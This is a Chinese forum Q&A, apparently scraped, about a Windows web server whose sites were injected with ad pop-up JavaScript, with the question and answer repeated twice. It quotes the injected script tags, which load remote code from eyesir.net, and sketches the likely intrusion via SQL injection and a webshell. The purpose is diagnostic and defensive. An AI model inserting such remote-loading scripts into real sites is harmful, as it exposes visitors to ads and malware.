[摘要] 这是一种典型的挂马,黑客将你的服务器攻陷后(有时甚至不用攻陷),通过修改你网站代码,来达到抓肉鸡,赚取点击量或者其他什么目的。
网友问:
今日发现我服务器上所有站点打开皆有一段莫明其妙的广告弹出,查看原文件让我惊讶了,代码中被植入了一段Js脚本< script src="http://iisa1.eyesir.net:7777/gethostjs.php" language="javascript" >< /script > ,
有时候会变成:
< script >var sUrl='http://www.eyesir.net:60000/ads.php?REFERER='+window.location;var _script = document.createElement('script');_script.setAttribute('type', 'text/javascript');_script.setAttribute('src', sUrl);document.getElementsByTagName('head')[0].appendChild(_script);< /script >
仔细查看服务器上的web页面没有发现什么异常情况,文件修改日期也没有更改过。 后来使用金山毒霸查了一遍,发现一个病毒木马(C:\WINDOWS\system32\wswinds.dat Backdoor.IRC.Pangu.a),再访问网站发现广告消失 了,查看源码那段异常代码也消失了。后来发现在目录C:\WINDOWS\system32下还有几个异常文件wswinds.com 和perfc009.dat和perfh009.dat,我想也得把这干掉,否则会有麻烦哦。
通过金山清除之后当时发现已经好了,但是过几天后又出现了,再用金山毒霸杀也没有发现有任何异常现象.
但是截至目前位置还不知道这木马是咋种上去的,有知情者麻烦告知我,我将感激不尽的。
网友答:
这是一种典型的挂马,黑客将你的服务器攻陷后(有时甚至不用攻陷),通过修改你网站代码,来达到抓肉鸡,赚取点击量或者其他什么目的。
首先,第一次出现的代码是比较原始的窗口弹出(就是将"http://iisa1.eyesir.net:7777/gethostjs.php"中的广告以窗口方式弹出)而第二次的代码是经过修改的(实际上也是达到同样的目的,但通过修改代码,用等价代码替换,可以绕过杀软的查杀,但庆幸的是最后还是被查杀了)
要做到这个其实不难,这个黑客最有可能是通过注入,得到网站后台密码,再上传木马,得到webshell,在通过webshell来上传修改过的网站源码。另外,跨站方式也是有可能的,如果你的服务器有多个网站,黑客就可以通过别的网站来控制服务器,进而修改你的网站。还有其他方式比如弱口令等,但概率不大。
我推荐你一个黑客工具:啊D,你到网上搜一下,下载下来,可以用它来检测你的网站是否有注入漏洞。
最后提醒你一句:自从出现了黑客,网站都没有绝对安全。既然黑客已经入侵了你的服务器,说明你的网站绝对有漏洞,要尽快修补。还有,按照惯例,黑客入侵后一般会在服务器中留后门或是木马(而且很有可能经过免杀,杀软查不出来),你即使将刚才几个东西删除了,黑客还有可能卷土重来。最后,即将广告代码删了,保不齐黑客还会在服务器中留其他挂马语句(而且被修改的更变态,杀软无法查出,或是这句挂马语句不是用来弹窗的,而是用来植入木马的,这种挂马如果做得好根本没有任何外在表现)
今日发现我服务器上所有站点打开皆有一段莫明其妙的广告弹出,查看原文件让我惊讶了,代码中被植入了一段Js脚本< script src="http://iisa1.eyesir.net:7777/gethostjs.php" language="javascript" >< /script > ,
有时候会变成:
< script >var sUrl='http://www.eyesir.net:60000/ads.php?REFERER='+window.location;var _script = document.createElement('script');_script.setAttribute('type', 'text/javascript');_script.setAttribute('src', sUrl);document.getElementsByTagName('head')[0].appendChild(_script);< /script >
仔细查看服务器上的web页面没有发现什么异常情况,文件修改日期也没有更改过。 后来使用金山毒霸查了一遍,发现一个病毒木马(C:\WINDOWS\system32\wswinds.dat Backdoor.IRC.Pangu.a),再访问网站发现广告消失 了,查看源码那段异常代码也消失了。后来发现在目录C:\WINDOWS\system32下还有几个异常文件wswinds.com 和perfc009.dat和perfh009.dat,我想也得把这干掉,否则会有麻烦哦。
通过金山清除之后当时发现已经好了,但是过几天后又出现了,再用金山毒霸杀也没有发现有任何异常现象.
但是截至目前位置还不知道这木马是咋种上去的,有知情者麻烦告知我,我将感激不尽的。
网友答:
这是一种典型的挂马,黑客将你的服务器攻陷后(有时甚至不用攻陷),通过修改你网站代码,来达到抓肉鸡,赚取点击量或者其他什么目的。
首先,第一次出现的代码是比较原始的窗口弹出(就是将"http://iisa1.eyesir.net:7777/gethostjs.php"中的广告以窗口方式弹出)而第二次的代码是经过修改的(实际上也是达到同样的目的,但通过修改代码,用等价代码替换,可以绕过杀软的查杀,但庆幸的是最后还是被查杀了)
要做到这个其实不难,这个黑客最有可能是通过注入,得到网站后台密码,再上传木马,得到webshell,在通过webshell来上传修改过的网站源码。另外,跨站方式也是有可能的,如果你的服务器有多个网站,黑客就可以通过别的网站来控制服务器,进而修改你的网站。还有其他方式比如弱口令等,但概率不大。
我推荐你一个黑客工具:啊D,你到网上搜一下,下载下来,可以用它来检测你的网站是否有注入漏洞。
最后提醒你一句:自从出现了黑客,网站都没有绝对安全。既然黑客已经入侵了你的服务器,说明你的网站绝对有漏洞,要尽快修补。还有,按照惯例,黑客入侵后一般会在服务器中留后门或是木马(而且很有可能经过免杀,杀软查不出来),你即使将刚才几个东西删除了,黑客还有可能卷土重来。最后,即将广告代码删了,保不齐黑客还会在服务器中留其他挂马语句(而且被修改的更变态,杀软无法查出,或是这句挂马语句不是用来弹窗的,而是用来植入木马的,这种挂马如果做得好根本没有任何外在表现)
